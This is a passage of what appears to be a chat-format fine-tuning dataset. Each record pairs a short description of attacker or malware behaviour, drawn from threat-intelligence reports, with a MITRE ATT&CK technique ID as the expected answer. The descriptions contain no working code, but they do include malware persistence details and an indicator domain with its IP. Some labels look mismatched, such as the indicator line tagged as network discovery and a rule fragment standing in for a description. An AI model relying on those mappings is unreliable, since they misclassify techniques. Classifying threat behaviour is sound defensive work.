Morphisec has investigated different samples from the same campaign. The following analysis presents our findings, focusing on the additional sophistication patterns and attribution patterns" }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NOKKI can collect the current timestamp of the victim's machine." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IcedID has used SSL and TLS in communications with C2." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the command line." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has deployed tools after moving laterally using administrative accounts." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download files remotely." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Autorun manager subsystem is responsible for tracking the way that the malicious module starts in the system and it maintains several different methods for starting automatically (shown below): LinkAutorun The subsystem searches for a LNK file in the target directory, changes the path to “cmd.exe” and the description to ‘ /q /c start “” “%s” && start “” “%s” ‘ TaskScheduler20Autorun The subsystem creates the ITaskService (works only on Windows Vista+) and uses the ITaskService interface to create a new task with a logon trigger StartupAutorun The subsystem creates a LNK file in %STARTUP% ScreenSaverAutorun The subsystem installs as a current screensaver with a hidden window HiddenTaskAutorun The subsystem creates the task ITaskScheduler (works only on pre-Vista NT). The task trigger start date is set to the creation date of the Windows directory ShellAutorun Winlogon registry [HKCUSoftwareMicrosoftWindows NTCurrentVersionWinlogon] Shell=”explorer.exe" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 queried the Registry to identify victim information." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has performed watering hole attacks." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Equation has been observed utilizing environmental keying in payload delivery." }, { "role": "assistant", "content": "T1480.001 - Environmental Keying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SysUpdate can deobfuscate packed binaries in memory." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can use WMI for lateral movement." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro has been used to run the \"tasklist\" command on a compromised system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet uses a driver to scan for specific filesystem driver objects." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After connecting to the IRC server, the MPK bot sends custom ping messages and provides an introduction via a “!Hello” message that contains the current logged in user of the infected host, if the user has administrator privileges, the hostname, the UUID of the system, and operating system version" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can retrieve lists of running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay can download files to a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework. The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The “screenshot” command takes a screenshot that is saved as a.PNG file in “ProgramData“" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "xCaon has communicated with the C2 server by sending POST requests over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When the .lnk file is initialized, it spawns a CMD process" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obtains the victim computer name and encrypts the information to send over its C2 channel." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can ZIP directories on the target system." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WMI classes are the primary structure within WMI" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has used 7-Zip and WinRAR to compress stolen files for exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names similar to legitimate domain names in appearance" }, { "role": "assistant", "content": "T1036 - Masquerading', 'T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malware used by is capable of capturing keystrokes." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used Ncrack to reveal credentials." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in “%APPDATA%\\..\\Local\\Temporary Internet Files\\Content.Word” and “%APPDATA%\\..\\Local Settings\\Temporary Internet Files\\Content.Word" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LookBack can list running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat actor launched a series of reconnaissance commands to try to obtain and enumerate information about the compromised machine, network architecture, users, and active directory enumeration" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collect + keychain in same sentence" }, { "role": "assistant", "content": "T1555.001 - Credentials from Password Stores: Keychain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turian has the ability to use Python to spawn a Unix shell." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has used the AD Explorer tool to enumerate users on a victim's network." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork collected the victim username and whether it was running as admin, then sent the information to its C2 server." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs UAC bypass." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Axiom group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate." }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRat can download additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADNEWS attempts to hide its payloads using legitimate filenames." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell has a command to perform video device spying." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has sent e-mails with malicious links to credential harvesting websites." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the PuTTY sample discovered on VirusTotal, the malicious code was inserted into the ssh2_userauth_process_queue function (source file: putty-0.77\\ssh\\userauth2-client.c). The code resides in the part of the function responsible for performing password authentication, as opposed to other methods such as public key or keyboard-interactive authentication. Once the user establishes a connection and enters their username and password, the malicious code is executed regardless of the authentication result." }, { "role": "assistant", "content": "T1480 - Execution Guardrails" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Calisto collects information on bookmarks from Google Chrome." }, { "role": "assistant", "content": "T1217 - Browser Bookmark Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has installed web shells on exploited Microsoft Exchange servers." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has used Tasklist to obtain information from a compromised host." }, { "role": "assistant", "content": "T1007 - System Service Discovery', 'T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT is capable of manipulating and deleting registry keys, including those used for persistence." }, { "role": "assistant", "content": "T1070.009 - Clear Persistence" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After installation, a keylogging routine begins. The malware writes keystrokes and window information to a filename in the present working directory with the following filename" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackTech has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments." }, { "role": "assistant", "content": "T1036.002 - Right-to-Left Override" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hikit has used DLL Search Order Hijacking to load \"oci.dll\" as a persistence mechanism." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "They dumped specific hives from the Windows Registry, such as the SAM hive, which contains password hashes" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Caterpillar WebShell has a module to collect information from the local database." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server. The error code is the value returned by the GetLastError function and sent in the next beacon. This was likely included to help the attackers understand the problem if the backdoor is unable to receive a response (Figure 9). This Cookie header is a unique indicator that can be used for network-based detection" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedAmmyy has collected information and files from a compromised machine." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "decodes strings in the malware using XOR and RC4." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NavRAT uses \"tasklist /v\" to check running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a scheduled task to run itself every three minutes." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some resources in Prikormka are encrypted with a simple XOR operation or encoded with Base64." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, the initialized file downloads multiple malicious payloads from remote servers" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rising Sun can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. Rising Sun can enumerate the compilation timestamp of Windows executable files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro can download malicious files with a .tmp extension and append them with .exe prior to execution." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once on a victim’s PC, the dropper executable is launched and it decrypts and loads the Gh0stRAT DLL into memory. It then passes the config buffer to the extracted DLL and calls the exported function (Shellex" }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Seasalt uses cmd.exe to create a reverse shell on the infected endpoint." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additionally, in the event Kaspersky is detected, the malware will immediately run the ‘Conime.lnk’ shortcut file in a new process after it is created" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Imminent Monitor has a keylogging module." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has conducted internal spearphishing from within a compromised organization." }, { "role": "assistant", "content": "T1534 - Internal Spearphishing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Smoke Loader uses HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt is one of the most notorious cybercrime operations, with attacks against more than 100 banks across 40 countries attributed to the group. Morphisec Labs believes that the Cobalt Group split following the arrest of one of its top leaders in Spain in March of 2018. While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. Although the code is heavily obfuscated, the entry point is easily identifiable. The VB code is executed starting from the Frame1_Layout function – this method is used much less frequently than the obvious Document_Open or the AutoOpen. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Organizations should expect to see much more coming from all Cobalt Group factions during the next year" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a keylogger module." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Steals Google Chrome and Apple Safari browser cookies from the victim’s machine - Steals saved usernames and passwords in Chrome - Steals saved credit card credentials in Chrome - Steals iPhone’s text messages if backed up to Mac - Steals cryptocurrency wallet data and keys - Keeps full control of the victim using the EmPyre backdoor - Mines cryptocurrency on the victim’s machine" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CSPY Downloader has the ability to self delete." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When checking network connection with the “netstat” command, both cases use the “-naop” option in conjunction with the “tcp“ - Filtering the result, both cases use the “findstr” command instead of “find" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malware used by attempts to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe)." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "mericcs.org 221.121.138.141 Domain used for spear phish sender e-mail address and to host malicious documents" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silent Librarian has exfiltrated entire mailboxes from compromised accounts." }, { "role": "assistant", "content": "T1114 - Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by SPACESHIP." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In our analysis we could observe how the adversary ensures persistence by delivering an LNK file into the startup folder" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what  commands the C2 wishes to run by issuing a request to the following URL:http:///what? After issuing the what command, the Trojan will parse the C2’s response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1573 - Encrypted Channel', 'T1041 - Exfiltration Over C2 Channel', 'T1571 - Non-Standard Port', 'T1132 - Data Encoding', 'T1008 - Fallback Channels', 'T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 26. Communication with the C&C server after the exchange of OS packet info Meanwhile, the runHandle method of the main backdoor loop will call for the requestServer method with the following backdoor commands (each command has one byte long code and is extracted by Packet::getCommand): Figure 27. The getCommand method The figure below shows the example of two of several possible command codes" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WhisperGate can Base64 encode strings, store downloaded files in reverse byte order, and use the Eazfuscator tool to obfuscate its third stage." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLATINUM has used the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PittyTiger attempts to obtain legitimate credentials during operations." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in 